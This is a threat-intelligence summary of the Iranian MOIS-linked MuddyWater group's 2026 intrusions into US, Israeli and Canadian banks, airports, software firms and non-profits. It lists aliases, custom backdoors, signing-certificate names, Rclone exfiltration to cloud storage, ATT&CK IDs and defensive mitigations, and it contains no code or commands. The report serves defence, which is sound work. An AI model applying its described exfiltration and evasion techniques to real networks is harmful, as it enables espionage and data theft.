Full Report
MOIS-linked MuddyWater crew has a new, custom implant An Iranian cyber crew believed to be part of the Iranian Ministry of Intelligence and Security (MOIS) has been embedded in multiple US companies' networks - including a bank, software firm, and airport, among others - since the beginning of February, with more activity in the days following the US and Israeli military strikes, according to security researchers.…
Analysis Summary
# Threat Actor: MuddyWater
## Attribution & Identity
* **Primary Name:** MuddyWater
* **Aliases:** Seedworm, Static Kitten
* **Associated Groups:** Iranian Ministry of Intelligence and Security (MOIS)
* **Attribution:** Formally attributed by the FBI, CISA, and the UK NCSC as a subordinate element of the Iranian MOIS.
## Activity Summary
Since early February 2026, MuddyWater has been embedded in several high-value U.S., Israeli, and Canadian networks. Activity surged following U.S. and Israeli military strikes. The campaign involved the deployment of two previously unknown backdoors and attempts to exfiltrate data, likely for intelligence gathering or prepositioning for future disruptive operations.
## Tactics, Techniques & Procedures
* **Initial Access:** Typically leverages spear-phishing or exploiting vulnerabilities in public-facing applications (though exact entry for this campaign is unconfirmed).
* **Persistence:** Use of custom-signed backdoors to maintain long-term access.
* **Execution:** Utilization of **Deno** (JavaScript/TypeScript runtime) to execute malware.
* **Data Exfiltration:** Usage of **Rclone** to move data to cloud storage.
* **Evasion:** Malware signed with legitimate-looking certificates (e.g., "Amy Cherne," "Donald Gay") to bypass security controls.
* **Surveillance:** Exploitation of internet-connected CCTV and security cameras for real-time intelligence and physical strike coordination (based on historical May 2025/June 2026 patterns).
**MITRE ATT&CK IDs mentioned/implied:**
* Exfiltration to Cloud Storage (T1537)
* Exploit Public-Facing Application (T1190)
* Code Signing (T1553.002)
## Targeting
* **Sectors:** Banking/Finance, Software Development, Aviation (Airports), Non-Governmental Organizations (NGOs), Defense, and Aerospace.
* **Geography:** United States, Israel, Canada, and the Middle East.
* **Victims:**
* U.S. Bank
* U.S. Airport
* U.S. Software Firm (with defense/aerospace ties and Israeli presence)
* Canadian Non-profit
* U.S. Non-profit
* Israeli infrastructure (primary target)
## Tools & Infrastructure
* **Dindoor:** A new backdoor using the Deno runtime for execution.
* **Fakeset:** A custom Python-based backdoor.
* **Stagecomp / Darkcomp:** Historic malware families linked via shared code-signing certificates.
* **Rclone:** Command-line program used to sync files to cloud storage.
* **Cloud Infrastructure:** Wasabi cloud storage bucket (used for exfiltration).
* **Certificates:** Signed under "Amy Cherne" and "Donald Gay."
## Implications
The actor’s presence in critical infrastructure (airports/banks) and defense-linked software firms provides a "dual-use" capability. While the current focus appears to be intelligence gathering, the established persistence allows for a rapid pivot to disruptive or destructive attacks (e.g., wiper malware or system outages) in response to escalating physical kinetic conflicts between the U.S., Israel, and Iran.
## Mitigations
* **Vulnerability Management:** Prioritize patching of all public-facing assets to prevent initial entry.
* **Egress Filtering:** Monitor and restrict the use of cloud synchronization tools like Rclone to unauthorized cloud storage providers (e.g., Wasabi).
* **Certificate Auditing:** Audit and monitor for unusual signed binaries, specifically certificates associated with "Amy Cherne" or "Donald Gay."
* **Runtime Monitoring:** Monitor for unusual executions of the Deno runtime or Python scripts on terminal endpoints.
* **IoT Security:** Secure and segment internet-facing CCTV cameras and change default credentials to prevent surveillance exploitation.